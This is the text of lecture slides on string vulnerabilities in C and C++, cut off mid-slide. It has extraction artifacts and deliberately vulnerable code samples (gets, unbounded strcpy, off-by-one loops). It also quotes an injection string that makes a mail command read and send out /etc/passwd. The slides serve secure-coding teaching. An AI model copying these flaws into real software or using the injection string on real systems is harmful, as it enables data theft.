1Secure Coding in C and C++String VulnerabilitiesLecture 3Acknowledgement: These slides are based on author Seacord’s original presentationNotez Ideas presented in the book generalize but examples are specific toz Microsoft Visual Studioz Linux/GCCz 32-bit Intel Architecture (IA-32)2Issuesz Stringsz Background and common issuesz Common String Manipulation Errorsz String Vulnerabilitiesz Mitigation StrategiesStringsz Comprise most of the data exchanged between an end user and a software systemz command-line argumentsz environment variablesz console inputz Software vulnerabilities and exploits are caused by weaknesses inz string representationz string managementz string manipulation3C-Style Stringsz Strings are a fundamental concept in software engineering, but they are not a built-in type in C or C++.z C-style strings consist of a contiguous sequence of characters terminated by and including the first null character. z A pointer to a string points to its initial character. z String length is the number of bytes preceding the null characterz The string value is the sequence of the values of the contained characters, in order.z The number of bytes required to store a string is the number of characters plus one (x the size of each character)h e l l o \0lengthC++ Stringsz The standardization of C++ has promoted z the standard template class std::basic_stringz and its char instantiation std::stringz The basic_string class is less prone to security vulnerabilities than C-style strings.z C-style strings are still a common data type in C++ programsz Impossible to avoid having multiple string types in a C++ program except in rare circumstances z there are no string literals z no interaction with the existing libraries that accept C-style strings OR only C-style strings are used4Common String Manipulation Errorsz Programming with C-style strings, in C or C++, is error prone. z Common errors includez Unbounded string copiesz Null-termination errorsz Truncationz Write outside array boundsz Off-by-one errorsz Improper data sanitizationUnbounded String Copiesz Occur when data is copied from a unbounded source to a fixed length character array1. int main(void) {2. char Password[80];3. puts("Enter 8 character password:");4. gets(Password); ...5. }5Copying and Concatenation z It is easy to make errors when z copying and concatenating strings because z standard functions do not know the size of the destination buffer1. int main(int argc, char *argv[]) {2. char name[2048];3. strcpy(name, argv[1]);4. strcat(name, " = ");5. strcat(name, argv[2]);...6. }Simple Solutionz Test the length of the input using strlen()and dynamically allocate the memory1. int main(int argc, char *argv[]) {2. char *buff = (char *)malloc(strlen(argv[1])+1);3. if (buff != NULL) {4. strcpy(buff, argv[1]);5. printf("argv[1] = %s.\n", buff);6. }7. else {/* Couldn't get the memory - recover */8. }9. return 0;10. }6C++ Unbounded Copyz Inputting more than 11 characters into following the C++ program results in an out-of-bounds write:1. #include <iostream.h>2. int main(void) {3. char buf[12];4. cin >> buf;5. cout << "echo: " << buf << endl;6. }1. #include <iostream.h>2. int main() {3. char buf[12];3. cin.width(12);4. cin >> buf;5. cout << "echo: " << buf << endl;6. }Simple SolutionThe extraction operation can be limited to a specified number of characters if ios_base::width is set to a value > 0After a call to the extraction operation the value of the width field is reset to 07Null-Termination Errorsz Another common problem with C-style strings is a failure to properly null terminateint main(int argc, char* argv[]) {char a[16];char b[16];char c[32];strncpy(a, "0123456789abcdef", sizeof(a));strncpy(b, "0123456789abcdef", sizeof(b));strncpy(c, a, sizeof(c));}Neither a[] nor b[] are properly terminatedFrom ISO/IEC 9899:1999The strncpy function char *strncpy(char * restrict s1,const char * restrict s2,size_t n);zcopies not more than n characters (characters that follow a null character are not copied) from the array pointed to by s2 to the array pointed to by s1*)z *Thus, if there is no null character in the first n characters of the array pointed to by s2, the result will not be null-terminated.8String Truncationz Functions that restrict the number of bytes are often recommended to mitigate against buffer overflow vulnerabilitiesz strncpy() instead of strcpy()z fgets() instead of gets()z snprintf() instead of sprintf()z Strings that exceed the specified limits are truncatedz Truncation results in a loss of data, and in some cases, to software vulnerabilitiesWrite Outside Array Bounds1. int main(int argc, char *argv[]) {2. int i = 0;3. char buff[128];4. char *arg1 = argv[1];5. while (arg1[i] != '\0' ) {6. buff[i] = arg1[i]; 7. i++;8. }9. buff[i] = '\0';10. printf("buff = %s\n", buff);11. }Because C-style strings are character arrays, it is possible to perform an insecure string operation without invoking a function9Off-by-One Errorsz Can you find all the off-by-one errors in this program?1. int main(int argc, char* argv[]) {2. char source[10];3. strcpy(source, "0123456789");4. char *dest = (char *)malloc(strlen(source));5. for (int i=1; i <= 11; i++) {6. dest[i] = source[i];7. }8. dest[i] = '\0';9. printf("dest = %s", dest);10. }Improper Data Sanitizationz An application inputs an email address from a user and writes the address to a buffer [Viega 03]sprintf(buffer,"/bin/mail %s < /tmp/email",addr);z The buffer is then executed using the system() call. z The risk is, of course, that the user enters the following string as an email address:z [email protected]; cat /etc/passwd | mail [email protected] [Viega 03] Viega, J., and M. Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.10Program Stacksz A program stack is used to keep track of program execution and state by storingz return address in the calling functionz arguments to the functions z local variables (temporaryz The stack is modified z during function callsz function initializationz when returning from a subroutineCodeDataHeapStackStack Segmentz The stack supports nested invocation callsz Information pushed on the stack as a result of a function call is called a frame Stack framefor main()Low memoryHigh memoryStack framefor a()Stack framefor b()Unallocatedb() {…}a() {b();}main() {a();}A stack frame is created for each subroutine and destroyed upon return11Stack